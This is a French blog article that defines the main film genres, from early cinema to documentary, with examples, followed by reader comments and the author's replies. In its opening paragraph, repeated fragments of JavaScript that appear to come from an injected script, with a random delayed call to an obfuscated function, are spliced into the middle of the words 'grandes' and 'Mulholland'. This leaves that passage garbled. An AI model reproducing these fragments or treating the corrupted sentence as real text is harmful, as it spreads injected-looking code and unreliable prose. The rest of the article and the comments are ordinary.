fbpx

Le genre cinématographique permet de ranger dans des catégories les films en tenant compte de ce qui les caractérisent.

Les principaux types et genres cinématographiquesBien entendu, un film peut appartenir à plusieurs catégories à la fois. C’est d’ailleurs souvent le cas des grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andes œuvres telles que Métropolis ou Mulhollandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Drive qui sont impossibles à ranger dans une case.

Le cinéma primitif

Le cinéma primitif désigne les films qui ont été réalisés avant la première guerre mondiale. Par exemple, les films de Georges Méliès font partie de cette catégorie.

Le film d’horreur

Le film d’horreur est aussi appelé film d’épouvante. Ce type de film désigne un cinéma qui montre des scènes qui suscitent l’effroi et la peur du spectateur. Pour l’exemple, nous pouvons citer la saga Freddy Krueger ou encore le cultisme Bad Taste.

Le film catastrophe

Le film catastrophe raconte une histoire qui relate un accident ou un cataclysme naturel. Les effets spéciaux sont importants pour ce type de film qui met presque toujours en danger la vie des personnages.

Le film de science-fiction

Les principaux types et genres cinématographiquesLe film de science fiction se passe souvent dans un futur plus ou moins proche. Les décors et le scénario sont  totalement imaginaires, même si des effets de réalité peuvent exister. Star Wars, Retour vers le futur, Ready Player One ou Jurassic Park sont des films appartenant à la catégorie des films de science fiction.

À noter aussi que des sous-branches existent dans cette catégorie comme le space opéra ou encore le steampunk.

Le film policier

Le genre cinématographique policier met en scène des malfrats s’opposant aux forces de l’ordre.

Le film historique

Le film historique raconte un fait historique. Les films qui se déroulent à une époque passée dont l’intrigue n’est pas authentifié comme fait historique ne font pas partie de cette catégorie.

La liste de Schindler, Amadeus, Le jour le plus long sont des films historiques populaires.

Le cinéma romantique

Un film romantique s’exerce à raconter une histoire à l’eau de rose. Les sentiments de cœur occupent une place centrale.

Le film comédie

À l’origine, une comédie est une pièce de théâtre qui fait rire le spectateur. Le genre comédie en cinéma désigne par extension un film qui provoque l’amusement du public.

Le film d’animation

Les principaux types et genres cinématographiquesLe dessin animé représente la technique d’animation la plus utilisée. Mais d’autres techniques existent: image de synthèse, pâte à modeler, peinture, sable, marionnettes, figurines…

Le cinéma dramatique

Un film dramatique adopte généralement un ton sérieux. L’histoire raconte des problèmes humains ou sociétaux graves qui peuvent conduite le spectateur vers un sentiment de tristesse.

Le film d’action

Les films d’action montrent des scènes qui sont souvent spectaculaires : explosion, chute, combat, course voiture…

Le cinéma hollywoodien accorde une place importante au film d’action.

Le film documentaire

Le film documentaire sert à transmettre un savoir. La fiction n’existe pas pour ce genre cinématographique qui est gouverné par des faits réels. En d’autres termes, il serait donc impossible d’écrire un scénario pour un film documentaire. En réalité, un nouveau genre est apparu : le documentaire fiction, qui reproduit avec des acteurs les événements historiques. Le biopic en fait partie. Un biopic, contraction de biographic picture, est une œuvre de fiction racontant la biographie d’un personnage célèbre comme Winston Churchill par exemple.

 

17 Comments

  • Stephane dit :

    Bonne remarque.

    Il existe un livre entier d’exemples qui s’appelle “save the cat goes to the movies” de Blake Snyder.
    Il y a environ cinquante films analysés, y compris par genre.

  • Kevine danga dit :

    moi je trouve que les explications sont bonne, mais je souhaite asse-que; à chaque partie, que cela soit etablie par un exemple merci!

  • Stephane dit :

    Merci Florine.

    Bon éclairage venant d’une professionnelle.
    C’est vrai que notre vocabulaire n’est pas assez spécifique ici.
    Merci pour ta remarque.

  • Paulius Florine dit :

    Bonjour, je voudrais apporter des petites précisions concernant le cinéma d’animation (je suis moi-même animatrice et réalisatrice). Il s’agit en réalité d’un outil, d’une technique, et non d’un genre puisqu’on peut retrouver tout type de films d’animation (comédie, horreur, sf, ou même documentaire). Et le dessin animé n’est pas une technique d’animation, c’est un terme générique utilisé dans un but de vulgarisation. Je pense que vous voulez parler ici d’animation traditionnelle.
    Très bonne continuation à vous et merci pour votre travail !

  • Stephane dit :

    Merci, ça fait très plaisir.
    A bientôt.

  • Konaté Abdoul karim dit :

    Ça fait du bien de passer par ici
    C’est explications sont très intéressantes

  • Joseph Yeropa dit :

    Je trouve cet article tres concis dans le desctiptif accordé a chacun des genres cinematographiques, mais plutôt enrichissant.

  • Stephane dit :

    Bonjour Hakim.

    S’agit-il d’un documentaire historique ou suivons-nous des personnages et de quelle façon ?
    Ce n’est pas le sujet qui détermine le genre scénaristique mais la manière, l’angle, sous lequel on raconte l’histoire.
    J’ai besoin d’en savoir plus.

    Stéphane

  • HAKIM dit :

    BONJOUR, a quel genre de fim appartient un film qui raconte l’histoire des indiens d’amazonie ?
    CORDIALEMENT

  • kane mahoula dit :

    merci pour ces explications qui pour moi sont logiques.

  • Stephane dit :

    Le film de 1996 tu veux dire ?
    Non, l’audience a été moyenne.

  • Mimi dit :

    Est ce que le film comédien a eu une année de popularité

  • Stephane dit :

    Avec grand plaisir.
    Stef

  • Anonyme dit :

    Merci beaucoup pour ces connaissances.

  • Stephane dit :

    Merci Ferry

    Tous nos encouragement pour tes succès de cinéaste Camerounais.
    Le cinéma africain est en plein essor.
    Je souhaite que tu nous éblouisses.
    Stéphane

  • Ferry Teikeu dit :

    J’ai beaucoup kiffé les explications sur les types de genres de films, et j’ai appris énormément, les notions qu au par avant je parlais avec une peur et souvent un doute absolu m’ont été clairement étayées dans ce document. Je suis Ferry Teikeu, jeune cinéaste camerounais. Suis vraiment très ravi pour celà. Et je serai fier de faire passer mon prochain court métrage sur l’un des festivals destinés au débutants en cinéma.
    Merci encore et que le seigneur vous bénisse.

Laissez votre réponse

 

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.